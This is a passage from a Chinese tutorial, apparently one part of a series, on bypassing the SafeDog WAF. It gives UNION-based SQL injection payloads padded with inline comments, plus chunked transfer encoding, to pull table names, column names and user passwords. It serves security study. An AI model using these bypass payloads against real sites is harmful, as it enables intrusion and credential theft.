主页 > 网络知识 > 绕过WAF的常见Web漏洞利用分析(3)

绕过WAF的常见Web漏洞利用分析(3)

 

1605062398_5fab4efe89e4d7e020b16.png!small?1605062398600

 

方法二 分块传输

分块传输依然可以

1' union select 1,database() --+

 

1605062416_5fab4f108b6977506b12d.png!small?1605062416596

 

 

1605062420_5fab4f14203faf76fe495.png!small?1605062421493

 

获取数据库中的表 方法一

正常注入语句:

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+

根据前面的测试,这个绕过就很简单了,只需要将一个空格地方替换成/*%%!asd%%%%*/即可。

Payload:

1' union/*%%!asd%%%%*/select 1,group_concat(table_name) /*%%!asd%%%%*/from /*%%!asd%%%%*/information_schema.tables where table_schema=database(/*%%!asd%%%%*/) --+

 

1605062431_5fab4f1f7662ae6ff37d6.png!small?1605062431530

 

方法二 分块传输

 

1605062436_5fab4f242e9aeeb8a8ce6.png!small?1605062436172

 

 

1605062440_5fab4f286dae49ce25a3d.png!small?1605062440480

 

获取表中的字段名 方法一

正常注入语句:

1' union select 1,group_concat(column_name) from information_schema.columns where table_name=’users’ --+

绕过方法和获取表的操作无异:

1' union/*%%!asd%%%%*/select 1,group_concat(column_name) /*%%!asd%%%%*/from/*%%!asd%%%%*/information_schema.columns where table_name=’users’ --+

 

1605062445_5fab4f2d4d1e86c1c2798.png!small?1605062445337

 

方法二 分块传输

 

1605062450_5fab4f32baebed79c19c5.png!small?1605062450816

 

 

1605062453_5fab4f35cdfdc1ec5f6ad.png!small?1605062453826

 

获取数据 方法一

正常注入语句:

1' union select group_concat(user),group_concat(password) from users --+

绕过方法还是一样:

1' union/*%%!asd%%%%*/select group_concat(user),group_concat(password) /*%%!asd%%%%*/from/*%%!asd%%%%*/users --+

 

1605062458_5fab4f3a47e7e9be532c4.png!small?1605062458299

 

方法二 分块传输

 

1605062462_5fab4f3e8b231ff50ec7b.png!small?1605062462623

 

 

1605062474_5fab4f4a6232ed3b2b539.png!small?1605062474396

 

文件上传

安全狗对文件上传的拦截是通过检测文件扩展名来实现的。只要解析结果在禁止上传的文件类型列表中,就会被拦截。

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!